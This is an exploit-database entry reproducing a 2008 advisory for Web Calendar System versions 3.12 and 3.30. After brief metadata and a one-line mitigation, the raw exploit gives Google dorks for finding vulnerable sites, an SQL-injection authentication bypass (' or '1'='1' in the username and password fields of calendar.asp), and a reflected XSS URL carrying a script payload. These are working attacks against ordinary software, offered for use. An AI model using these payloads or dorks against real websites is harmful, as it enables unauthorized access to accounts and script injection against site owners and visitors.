header-logo
Suggest Exploit
vendor:
Web Calendar System
by:
blackbeard-sql@hotmail.fr
7.5
CVSS
HIGH
Multiple Exploits (XSS + remote bypass Exploit)
79
CWE
Product Name: Web Calendar System
Affected Version From: 3.12
Affected Version To: 3.3
Patch Exists: YES
Related CWE: N/A
CPE: a:web_calendar_system:web_calendar_system:3.30
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Web Calendar System v 3.12/3.30

The vulnerability is a combination of a remote bypass exploit and a remote XSS exploit. The remote bypass exploit can be triggered by sending a specially crafted HTTP request to the vulnerable application. The remote XSS exploit can be triggered by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000



[+] Script               : Web Calendar System v 3.12/3.30

[+] Exploit Type         : Multiple Exploits (XSS + remote bypass Exploit)

[+] Google Dork          : intitle:Web Calendar system v 3.30        inurl:.asp
[+] Google Dork          : intitle:Web Calendar system v 3.12        inurl:.asp

[+] Contact              : blackbeard-sql@hotmail.fr


--//--> Exploit : 

1) Remote Bypass Exploit :

http://[website]/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM

username:' or '1'='1

password:' or '1'='1

2) Remote XSS exploit : 

In simple words :

http://[website]/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]

# milw0rm.com [2008-11-27]